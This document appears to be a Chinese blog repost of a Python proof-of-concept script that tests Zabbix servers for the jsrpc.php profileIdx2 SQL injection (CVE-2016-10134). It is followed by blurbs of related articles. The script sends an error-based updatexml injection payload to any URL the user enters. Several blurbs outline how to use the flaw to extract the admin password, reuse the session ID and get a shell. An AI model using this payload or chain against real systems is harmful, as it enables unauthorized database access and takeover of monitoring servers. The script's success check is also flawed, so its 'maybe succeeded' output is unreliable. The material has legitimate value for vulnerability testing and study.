zabbix(sql注入判断脚本)

最新推荐文章于 2024-06-23 18:11:16 发布
最新推荐文章于 2024-06-23 18:11:16 发布
阅读量80 收藏
点赞数
文章标签: 运维 php
原文链接:http://www.cnblogs.com/crac/p/5783479.html
版权

zabbix(sql注入判断脚本)

#-*-coding:utf-8-*-
# code by anyun.org
import urllib
import re

def getHtml(url):
    page = urllib.urlopen(url)
    html = page.read()
    html = html.replace('\n', '')
    html = html.replace('       ', ' ')
    html = html.replace('   ', '')
    html = html.replace('   ', '')
    return html

url =raw_input('enter url:')
poc='jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&\
pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23\
&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17'
new_url=url+poc
try:
	if getHtml(new_url).find('flickerfreescreen')<>0:
		print 'maybe successeed'
	else:
		print 'maybe unsuccessed'
except:
	print 'http error?'

  

转载于:https://www.cnblogs.com/crac/p/5783479.html

weixin_30562507
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)
做自己喜欢的事,并将其发挥到极致!
06-30 1365
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。...
Zabbix SQL注入(CVE-2016-10134)
最新发布
qq_23003811的博客
07-18 168
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入。3、发现注入点profileIdx、profileIdx2。2、sqlmap跑注入点。
漏洞盒子/Zabbix SQL注入漏洞分析_小白白帽子教程
2401_84915584的博客
06-23 191
zabbix sql注入漏洞爆出来已有好几天了,最近忙于安全盒子用户中心的设计,一直没有去研究这个注入,今天早起,闲暇时间写下该文。
Zabbix sql注入漏洞(CVE-2016-10134)
m0_65150886的博客
12-27 933
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshel操作。3.登录后,查看Cookie中的zbx_sessionid,复制后16位字符。6.利用jsrpc的profileIdx2参数sql注入获取用户名和密码。5.在攻击机访问的zabbix的地址后面加上如下url。
zabbix-latest.php-SQL注入漏洞(CVE-2016-10134)
m0_51186260的博客
06-21 963
zabbix-latest.php-SQL注入漏洞
漏洞预警:zabbix再爆高危SQL注入漏洞,可获操作系统权限
寒江的专栏
08-18 1321
漏洞概述 zabbix是一个开源的企业级性能监控解决方案。 官方网站 http://www.zabbix.com zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。 影响程度 攻击成本:低 危害程度
AttackDetection
03-21
Java中可以通过参数化查询、预编译语句和使用ORM框架如Hibernate的内置防御机制来防止SQL注入。 2. 跨站脚本(XSS):攻击者通过在网页中插入恶意脚本,盗取用户信息。Java Web应用可以通过过滤输入、输出编码、...
RMonitor:Ricky的服务器状态项目,使用Thinkphp重写后端
05-24
同时,框架的安全特性,如输入验证、SQL注入防护,能有效保护系统免受潜在攻击。 总的来说,RMonitor结合了Thinkphp的强大功能,为服务器状态监控提供了一个高效且灵活的解决方案。通过合理的SQL导入、worker配置...
数据库运维工程师的职责 数据库运维.pdf
04-19
同时,他们还需关注安全性,设置访问控制,防止未授权的访问和潜在的SQL注入攻击。 在实际工作中,数据库管理员通常需要对数据库进行安装、部署、升级等操作。对于Greenplum这样的分布式数据库系统,这意味着要熟悉...
SEA_Hacks
02-14
2. **渗透测试**:Python可以用于编写自动化脚本,执行各种渗透测试任务,如SQL注入检测、XSS攻击测试等。例如,使用Burp Suite的Python接口可以扩展其功能。 3. **密码学**:Python支持各种加密算法,如AES、RSA等...
基于PHP的禅道php mvc框架.zip
07-24
8. **安全实践**:学习如何防范SQL注入、XSS攻击等常见Web安全问题,以及框架提供的安全措施。 9. **性能优化**:了解框架的缓存机制、路由优化、代码编译等方法,以提升Web应用的性能。 10. **API开发**:如果...
[CVE-2016-10134]zabbix sql注入实测
Delphinidae
11-19 311
参考链接:vulhub 目的:熟悉和复现该漏洞做治理内部发现的漏洞 漏洞注入点:profileIdx2 漏洞路由:/jsrpc.php这个文件 漏洞环境:搭建vulhub docker环境 用brupsuite 抓包开始复现漏洞,确认漏洞是否存在,那当前用户数据用户名 user(),可见有root用户返回,证明漏洞存在。 报错注入的漏洞存在。 sql注入漏洞存在,下一步是取出关键信息,zabbix取出Admin的密码就可以控制该系统的所有主机了,那么开始取数据,通过zabbix相关信息查到登陆用户密码
漏洞复现----26、Zabbix latest.php SQL注入漏洞(CVE-2016-10134)
七天
06-28 726
一、Zabbix概述 Zabbix 是一个企业级分布式开源监控解决方案。Zabbix 软件能够监控众多网络参数和服务器的健康度、完整性。 Zabbix由以下组件组成: 1、Server:Zabbix server 是 Zabbix软件的核心组件,agent 向其报告可用性、系统完整性信息和统计信息。server也是存储所有配置信息、统计信息和操作信息的核心存储库。 2、数据库:所有配置信息以及 Zabbix 采集到的数据都被存储在数据库中。 3、Web 界面为了从任何地方和任何平台轻松访问 Zabbix
Zabbix SQL注入漏洞威胁预警通告
weixin_34244102的博客
09-01 157
Zabbix软件被爆存在SQL注入漏洞,攻击者无需登录即可通过script等功能直接获取服务器的操作系统权限,经过分析发现Zabbix默认开启了guest权限,且默认密码为空。为了帮助广大用户尽快关注这个信息,本文将会持续关注这个漏洞。 攻击难度:低。 危害程度:高。 官方通告网站如下: https://support.zabbix.com/bro...
一个关于sql注入寻找闭合的python小脚本
Alexz__的博客
09-16 441
头一天开始学python,在w3c上看了整整一天,第二天就开始对着一个成品的脚本尝试着敲了一个小脚本用来跑闭合的,和老师一起发现了几个关于python里urllib.request模块额问题 代码一直就敲的不是很好,勿喷 上源码 import urllib.request url = "" url_bihe = "http://192.168.60.129/sqli-labs-...
zabbix SQL注入漏洞 (CVE-2016-10134)
SoulCat
01-26 7145
zabbix SQL注入漏洞(CVE-2016-10134) 漏洞概述: zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle_ids[]或jsrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshell操作。 漏洞版本: 2.2.x 3....
zabbix注入过程分析
weixin_30481087的博客
08-20 102
Zabbix jsrpc.php sql注入过程分析 漏洞公开详情(https://support.zabbix.com/browse/ZBX-11023)中提示在insertDB() 中的insert方式存在SQL注入漏洞,如下图: 我们来逐步分析下 直接定位到cprofile:flush()函数所在的文件cprofile.php,代码如下。 ...
mysql中添加字段
热门推荐
m0_54850467的博客
09-11 4万+
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
vulhub之Zabbix
weixin_56306210的博客
01-22 839
vulhub之Zabbix
zabbix钉钉告警脚本
08-04
Zabbix钉钉告警脚本是一种用于在Zabbix监控系统中通过钉钉发送告警通知的脚本。根据引用[1],为了配置Zabbix钉钉告警脚本,需要进行以下步骤: 1. 为脚本添加执行权限,可以使用以下命令: ``` chown zabbix.zabbix zabbix_ding.py chmod +x zabbix_ding.py ``` 这样可以确保脚本可以被执行。[2] 2. 编辑Zabbix Server的配置文件zabbix_server.conf,设置AlertScriptsPath参数为默认脚本路径。可以使用以下命令进行编辑: ``` vi /etc/zabbix/zabbix_server.conf ``` 在配置文件中找到AlertScriptsPath参数,并将其设置为脚本的路径,例如: ``` AlertScriptsPath=/usr/lib/zabbix/alertscripts ``` 这样Zabbix就能够找到并使用该路径下的脚本。[3] 通过以上步骤,你就可以成功配置Zabbix钉钉告警脚本,并在Zabbix监控系统中使用钉钉发送告警通知了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值